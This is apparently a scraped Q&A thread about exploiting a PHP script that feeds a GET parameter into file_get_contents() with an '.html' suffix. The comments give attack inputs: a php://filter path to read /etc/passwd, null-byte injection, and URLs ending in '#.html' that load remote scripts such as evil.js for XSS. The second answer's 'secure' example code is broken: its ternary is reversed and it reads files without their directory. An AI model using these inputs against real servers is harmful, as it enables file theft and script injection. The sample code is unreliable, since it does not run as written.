Exploiting file_get_contents()

php apache security php-7 exploit

10,818

Solution 1

No, that will only ever read files ending in '.html', but that doesn't necessarily mean that it's secure! Generally, the more that you can sanitise and restrict the input, the better.

Also, for anyone planning to use file_get_contents like this, it's always good to remember that when serving from file_get_contents, you can serve files that are not normally accessible - either due to server configuration, e.g. .htaccess, or file permissions.

Solution 2

As @David said, this will only get files ending in '.html', but its not a good practice, if you have html folder and you want the user to get only files from that folder , you shouldn't do that, by using this method a hacker can access any .html file in your server, not just the ones you want him to see.

My suggestion is that if you have a specific folder that you want user to be able to get files from, scan the directory and check for the file name.

Here's an example:

<?php 

$paths = scandir('/html');

$file  = isset($_GET['display']) : $_GET['display'] ? null;

if(!$file) 
{
 die('no display provided');
}

$html = '';

foreach($paths as $path) {

   if($path !== '.' && $path !== '..' && $path === $file.'.html') {
     $html = file_get_contents($path);
   }
  
}


echo $html;

?>

10,818

Author by

terjanq

enter link description here

Updated on June 04, 2022

Comments

terjanq almost 2 years
Is it possible to read any file (not only those with the extension .html) from the server in the following script?
```
<?php
echo file_get_contents($_GET['display'].'.html');
?>
```
I know about wrappers (php://, file://, etc.) but achieved not too much.

I'm eager to hear all the possible vectors of attack.

The PHP configuration is default: allow_url_fopen On, and let's assume the version is >= 7.0, so null character %00 doesn't work.
- Andreas over 6 years
  
  What is "display" variable?
- terjanq over 6 years
  
  It's the variable attacker can control via GET request... http://example.com/script.php?display=[something_evil]
- Andreas over 6 years
  
  I saw the comment that you do this to exploit. How? What is your plan? If you file_get_contents a PHP file you will not get the code, only the output of the PHP.
- David A over 6 years
  
  So do you need to just access a file that you can't normally access, or do you need to be able to access an arbitrary file?
- terjanq over 6 years
  
  If this is the duplicate then with it: stackoverflow.com/questions/12731547/… But the post is from 2012, and the proposed vendor doesn't work anymore. @DavidA I'm wondering if I could for example read /etc/passwd, by trying something like: php://filter/resource=file:///etc/passwd, but the appended suffix is breaking the expression
- Mark Baker over 6 years
  
  If the filename passed via $_GET contains a null byte, then yes, it is possible to exploit and access any file - null byte injection - which bypasses the appended extension
- CBroe over 6 years
  
  This doesn't even need null bytes to become a catastrophe quickly ... As you say, allow_url_fopen is on, so I can make your site make a request to any http(s) URL of my choosing, and have it output the response to the user of your site ... hello XSS old friend. And appending .html is not going to stop me from including any URL I like, even ones I don't have control over - easily countered by ending the URL I feed your script so that it becomes ...&needlessquerystringparameter=.html or .../evil.js#.html
- terjanq over 6 years
  
  That's exactly what my idea is about. But as long as removing .html suffix in ULR is quite easy, exactly as you have shown, exploiting file_path is a bigger challenge. Null byte injection doesn't work for recent php version.